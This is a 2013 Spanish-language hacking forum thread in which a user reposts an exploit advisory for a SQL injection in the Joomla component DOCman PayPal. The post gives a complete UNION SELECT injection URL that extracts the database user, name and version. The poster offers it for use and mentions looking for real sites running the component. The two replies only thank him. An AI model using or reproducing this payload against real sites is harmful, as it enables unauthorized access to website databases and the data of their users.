comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Joomla Vulnerabilidad Complemento DOCman Paypal

  • 2 Respuestas
  • 2236 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ZanGetsu

  • *
  • Underc0der
  • Mensajes: 325
  • Actividad:
    0%
  • Reputación 0
  • I ZanGetsu
    • Ver Perfil
  • Skype: thenicox
  • Twitter: black_zangetsu
« en: Abril 04, 2013, 09:16:23 pm »
Hola a todos, les paso a dejar una vulnerabilidad
en un complemento de Joomla llamado Docman Paypal, el cual salio
hace poco en 1337day, dicho complemento es de pago por tanto
me impidio a hacer un tutorial (hasta encontrar algun joomla con ese complemento)
pero si les traigo la Injeccion e Info:

#######################################################
#
#  Joomla Component DOCman PayPal <= (id) SQL injection Vulnerability
#
#######################################################
# Author : ByEge
# Author Blog : No tienes permisos para ver links. Registrate o Entra con tu cuenta
# Date : 28.03.2013
# Download script : No tienes permisos para ver links. Registrate o Entra con tu cuenta
#######################################################
 
# test site vulnerability : No tienes permisos para ver links. Registrate o Entra con tu cuenta
 
# SQL Union Code : index.php?option=com_docmanpaypal&task=file&id=4+and+false+UnIOn+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,CHAR(60,104,49,62,66,121,69,103,101,60,104,49,62),44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65--
 
#######################################################

El complemente se puede encontrar en la siguiente web y esta disponible para
versiones de Joomla (hasta 2.5): No tienes permisos para ver links. Registrate o Entra con tu cuenta
con un video tutorial de instalacion, sin mas que decir, disfrutenlo, Saludos !

Desconectado morodog

  • *
  • Underc0der
  • Mensajes: 350
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: MorodoG
  • Twitter: m4r4d4g
« Respuesta #1 en: Abril 05, 2013, 09:27:26 am »
Buena info! Thx!

Desconectado M3XT4R

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
  • Nada es verdad, todo es posible...
    • Ver Perfil
« Respuesta #2 en: Abril 08, 2013, 03:51:54 pm »
Muy buena (Y)
M3X1C4N H4CK3R

#GrayHat

 

¿Te gustó el post? COMPARTILO!



Explotar vulnerabilidad critica en routers con firmeware W300V3.1.0a_DR0_AR

Iniciado por Lonewolf

Respuestas: 0
Vistas: 1790
Último mensaje Octubre 13, 2016, 12:39:17 pm
por Lonewolf
Explotar Vulnerabilidad de Gmail para Obtener Direcciones de Correo

Iniciado por qwartz

Respuestas: 9
Vistas: 5095
Último mensaje Abril 26, 2017, 05:21:06 am
por animanegra
Grave vulnerabilidad en PHP-CGI permite ejecutar código remoto en Apache

Iniciado por Stiuvert

Respuestas: 2
Vistas: 2744
Último mensaje Mayo 22, 2012, 11:10:18 pm
por baron.power
Salto de restricciones con "clickjacking" en Joomla!

Iniciado por Aryenal.Bt

Respuestas: 1
Vistas: 1641
Último mensaje Noviembre 16, 2012, 02:40:28 pm
por hdbreaker
Vulnerabilidad grave en MySQL/MariaDB

Iniciado por Aryenal.Bt

Respuestas: 1
Vistas: 2317
Último mensaje Octubre 06, 2012, 03:10:40 am
por quen